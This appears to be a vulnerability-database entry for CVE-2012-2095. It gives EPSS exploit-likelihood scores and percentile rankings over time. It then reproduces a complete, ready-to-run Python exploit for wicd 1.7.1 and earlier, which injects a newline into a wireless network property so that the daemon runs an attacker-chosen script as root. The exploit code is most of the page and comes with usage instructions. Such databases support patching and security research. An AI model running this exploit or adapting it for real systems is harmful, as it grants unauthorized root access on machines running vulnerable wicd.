CVE-2012-2095 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	3.53%	–	–
2022-02-13	–	–	3.53%	–	–
2022-04-03	–	–	3.53%	–	–
2022-05-15	–	–	3.53%	–	–
2022-12-18	–	–	3.53%	–	–
2023-01-01	–	–	3.53%	–	–
2023-02-05	–	–	3.53%	–	–
2023-02-19	–	–	3.53%	–	–
2023-02-26	–	–	3.53%	–	–
2023-03-12	–	–	–	0.04%	–
2024-04-07	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2024-10-27	–	–	–	0.04%	–
2024-12-15	–	–	–	0.04%	–
2024-12-22	–	–	–	0.04%	–
2025-01-12	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-03-18	–	–	–	–	0.58%
2025-03-30	–	–	–	–	0.58%
2025-04-06	–	–	–	–	0.58%
2025-04-06	–	–	–	–	0.58,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	66%
2022-02-13	67%
2022-04-03	83%
2022-05-15	84%
2022-12-18	85%
2023-01-01	84%
2023-02-05	85%
2023-02-19	84%
2023-02-26	85%
2023-03-12	8%
2024-04-07	9%
2024-06-02	1%
2024-10-27	11%
2024-12-15	12%
2024-12-22	11%
2025-01-12	12%
2025-01-19	12%
2025-03-18	67%
2025-03-30	66%
2025-04-06	67%
2025-04-06	67%

#!/usr/bin/python #wicd <= 1.7.1 0day exploit discovered on 4.9.12 by InfoSec Institute student #For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html import sys import os import time import getopt try: from wicd import dbusmanager except: print "[!] WICD Error: libraries are not available. Is WICD installed?"; sys.exit(0) class Error(Exception): def __init__(self, error): self.errorStr=error def __str__(self): return repr(self.errorStr) class Wicd(): wireless=None daemon=None versionString=None def __init__(self): try: dbusmanager.connect_to_dbus() dbusInterfaces = dbusmanager.get_dbus_ifaces() self.wireless = dbusInterfaces["wireless"] self.daemon = dbusInterfaces["daemon"] except: raise Error("Daemon is not running") self.versionString = self.daemon.Hello() def versionLessThan(self, version): if int(self.versionString.replace(".",""))<=version: return True else: return False class Exploit(): def __init__(self, wicd, scriptPath): self.wicd = wicd self.scriptPath = scriptPath def getNets(self): self.wicd.wireless.Scan(True) nets = self.wicd.wireless.GetNumberOfNetworks() while nets < 1: self.wicd.wireless.Scan(True) nets = self.wicd.wireless.GetNumberOfNetworks() for net in range(nets): yield net def exploit(self): for net in self.getNets(): pass # Priming scan. try: self.wicd.wireless.SetWirelessProperty(0, "beforescript = "+ self.scriptPath +"\nrooted", "true") except: raise Error("Unable to exploit (SetWirelessProperty() failed.)") try: self.wicd.wireless.SaveWirelessNetworkProperty(0, "beforescript = "+ self.scriptPath +"\nrooted") except: raise Error("Unable to exploit (SetWirelessProperty() failed.)") propertyKey = 'bssid' # Could be essid, or any other identifiable wireless property vulnIdentifier = self.wicd.wireless.GetWirelessProperty(0, propertyKey) # TODO: Does this need a try construct? self.wicd.wireless.ReloadConfig() for net in self.getNets(): # Implicit, but required re-scan. if self.wicd.wireless.GetWirelessProperty(net, propertyKey) == vulnIdentifier: self.wicd.wireless.ConnectWireless(net) return True raise Error("Unable to exploit (Lost the network we were using)") def usage(): print "[!] Usage:" print " ( -h, --help ):" print " Print this message." print " ( --scriptPath= ): Required, executable to run as root." print " --scriptPath=/some/path/to/executable.sh" def main(): print "[$] WICD =< 1.7.0Day" try: opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "scriptPath="]) except getopt.GetoptError, err: # Print help information and exit: print '[!] Parameter error:' + str(err) # Will print something like "option -a not recognized" usage() sys.exit(0) scriptPath=None for opt, arg in opts: if opt in ("-h", "--help"): usage() sys.exit(0) elif opt =="--scriptPath": scriptPath=arg else: # I would be assuming to say we'll never get here. print "[!] Parameter error." usage() sys.exit(0) if not scriptPath: print "[!] Parameter error: scriptPath not set." usage() sys.exit(0) try: wicd = Wicd() except Error as error: print "[!] WICD Error: %s" % (error.errorStr) exit(0) print "[*] WICD Connection Initialized! (Version: %s)" % (wicd.versionString) if not wicd.versionLessThan(171): print "[!] WICD Warning: version print exceeds 1.7.1: Trying anyhow." exploit = Exploit(wicd, scriptPath) print "[*] Attempting to exploit:" try: exploit.exploit() except Error as error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0) print "[*] Exploit appears to have worked." # Standard boilerplate to call the main() function to begin # the program. if __name__=='__main__': main()